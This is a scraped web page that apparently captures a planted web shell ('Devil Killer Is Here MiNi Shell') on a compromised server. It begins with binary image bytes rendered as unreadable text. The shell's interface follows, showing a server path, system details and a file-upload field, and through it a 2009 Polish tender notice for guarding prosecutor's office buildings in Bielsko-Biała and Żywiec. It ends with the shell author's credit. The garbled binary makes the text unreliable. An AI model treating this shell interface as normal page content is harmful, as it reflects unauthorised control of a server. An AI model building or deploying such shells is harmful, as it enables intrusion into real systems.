JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/31318-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: III G 23 231 10 2009 PN
DOTYCZY : Całodobowego świadczenia czynnej usługi fizycznej ochrony budynków wraz z mieniem w Prokuraturze Okręgowej w Bielsku-Białej przy ulicy Legionów 81 oraz w Prokuraturze Rejonowej w Żywcu przy ulicy Powstańców Śląskich 9</b><br>
<b>Numer ogłoszenia: 31318 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Bielsku-Białej , ul. Listopadowa 31, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8126011, faks 033 8193311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prokuratura-bielsko.internetdsl.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> wbapobb@poczta.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> III G 23 231 10 2009 PN
DOTYCZY : Całodobowego świadczenia czynnej usługi fizycznej ochrony budynków wraz z mieniem w Prokuraturze Okręgowej w Bielsku-Białej przy ulicy Legionów 81 oraz w Prokuraturze Rejonowej w Żywcu przy ulicy Powstańców Śląskich 9.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest całodobowe świadczenie czynnej usługi fizycznej ochrony budynków wraz z mieniem. Dotyczy budynku Prokuratury Okręgowej w Bielsku-Białej przy ulicy Legionów 81 oraz budynku Prokuratury Rejonowej w Żywcu przy ulicy Powstańców Śląskich 9.  
2.	Usługa ochrony polegać ma na działaniu mającym na celu zapewnienie bezpieczeństwa budynków znajdujących się w Bielsku-Białej przy ulicy Legionów 81 oraz w Żywcu przy ulicy Powstańców Śląskich 9,  działaniu zapobiegającym przestępstwom i wykroczeniom przeciwko mieniu, a także przeciwdziałaniu powstaniu szkody wynikającej z tych zdarzeń oraz ze zdarzeń losowych oraz na ograniczeniu dostępu osób nieuprawnionych na teren chroniony..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.34.11.40-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.
Zamawiający nie wymaga od Wykonawców wniesienia, przed podpisaniem umowy, zabezpieczenia należytego wykonania  umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 8.	Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków. 
W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki :
1.	Warunki :
a.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania tych uprawnień;
b.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przestawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;		
c.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
d. 	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.	
2.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia	muszą wykazać, że warunki określone powyżej spełniają łącznie wszyscy Wykonawcy.				
3.	Ponadto :
a.	W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie   art. 24 ustawy oraz spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia.

4.	Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.
a.	O wykluczeniu z postępowania o udzielenie zamówienia Wykonawcy zostaną niezwłocznie zawiadomieni.
b.	Oferta Wykonawcy wykluczonego zostanie uznana za odrzuconą.
5.	Zamawiający odrzuci ofertę jeżeli zajdzie przesłanka odrzucenie oferty wyszczególniona w art. 89 ustawy Prawo zamówień .
6.	O odrzuceniu oferty zawiadomieni zostaną równocześnie wszyscy Wykonawcy.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w rozdziale VII i VIII przedmiotowego postępowania oświadczeń i dokumentów, wg formuły spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.	Dokumenty wymagane w ofercie :
Dokumenty wymagane w ofercie :
Oferta powinna składać się z następujących -ponumerowanych i parafowanych 
na każdej stronie dokumentów:
a.	Formularz cenowy, złożony na druku - załącznik nr 1 do SIWZ -Wykonawca może złożyć oświadczenie na własnym druku, którego treść i układ graficzny muszą być zgodne z drukiem załączonym do SIWZ;
b.	Oświadczenie dotyczące akceptacji warunków i wymagań dotyczących świadczonej usługi - załącznik Nr 2 -Wykonawca może złożyć oświadczenie na własnym druku, którego treść i układ graficzny muszą być zgodne z drukiem załączonym do SIWZ;
c.	Wykaz zamówień doświadczenie zawodowe Wykonawcy - załącznik Nr 3 Wykonawca może złożyć oświadczenie na własnym druku, którego treść i układ graficzny muszą być zgodne z drukiem załączonym do SIWZ;
d.	Wykaz pracowników wyznaczonych przez Wykonawcę do świadczenia przedmiotu zamówienia - załącznik Nr 4 Wykonawca może złożyć oświadczenie na własnym druku, którego treść i układ graficzny muszą być zgodne z drukiem załączonym do SIWZ;
e.	Wykaz osób,osoby do kontaktów z Zamawiającym - załącznik nr  5 -Wykonawca może złożyć oświadczenie na własnym druku, którego treść i układ graficzny muszą być zgodne z drukiem załączonym do SIWZ;
f.	Wzór umowy - załącznik nr  6. 
Oświadczenia,wykaz muszą być datowane pomiędzy datą sporządzenia niniejszej specyfikacji, a datą w której upływa termin składania ofert oraz zawierać podpis osoby uprawnionej do złożenia oferty.	
Nie złożenie lub złożenie w niewłaściwej formie któregokolwiek z dokumentów, o których mowa w ust. 1 spowoduje zastosowanie przepisów art. 25 i art. 26 ustawy.

Inne  dokumenty  wymagane  wraz  z  ofertą
1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych. Zamawiający żąda załączenia n/w oświadczeń i dokumentów -oświadczenia i dokumenty winny być ponumerowane, parafowane na każdej stronie oraz w przypadku kserokopii potwierdzone za zgodność z oryginałem:
a.	dokumenty potwierdzające posiadanie stosownych koncesji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, do których zastosowanie mają przepisy ustawy o ochronie osób i mienia oraz przepisy ustawy z dnia  o swobodzie działalności gospodarczej w zakresie działalności koncesjonowanej;
b.	dokumenty potwierdzające posiadanie licencji min. 1-go stopnia przez pracowników ochrony oddelegowanych przez Wykonawcę do świadczenia przedmiotu zamówienia -w rozumieniu ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia - tekst jednolity z 2005r. Dz.U. Nr 145, poz. 1221;
c.	dokumenty potwierdzające posiadanie stosownych poświadczeń bezpieczeństwa wydane przez Ministerstwo Spraw Wewnętrznych i Administracji wymagane przy dostępie do informacji niejawnych stanowiących tajemnicę służbową o klauzuli poufne, do których mogą mieć przypadkowy dostęp z racji wykonywanych czynności służbowych przez pracowników ochrony oddelegowanych przez Wykonawcę do świadczenia przedmiotu zamówienia -w rozumieniu ustawy z dnia 22 stycznia 1999 r. o ochronie informacji niejawnych - tekst jednolity Dz.U.Nr 196, poz. 1631 z 2005 r.;
d.	 Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przez upływem terminu składania ofert;
e.	  Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przez upływem terminu składania ofert;
f.	Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
g.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne, zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przez upływem terminu składania ofert;
h.	Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik;
i.	Dokument potwierdzający posiadanie przez Wykonawcę certyfikatu jakości ISO 9001 : 2000 w zakresie świadczonych usług będących przedmiotem zamówienia.
2.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzą i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia lub przestawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty :
a.	Wykaz co najmniej trzech wykonanych w okresie ostatnich trzech lat usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie;
b.	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności;
c.	dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
3.	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty należy dołączyć następujące dokumenty :
a.	Polisę lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej -na kwotę co najmniej 400.000,00 złotych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.prokuratuta-bielsko.internetdsl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa
ul. Listopadowa 31
43-300 Bielsko-Biała.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2009 godzina 09:00, miejsce: Prokuratura Okręgowa
ul. Listopadowa 31
43-300 Bielsko-Biała
biuro podawcze po prawej stronie wejścia głównego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com